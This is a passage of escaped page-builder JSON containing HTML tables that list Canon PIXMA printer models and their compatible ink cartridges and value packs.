(Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light 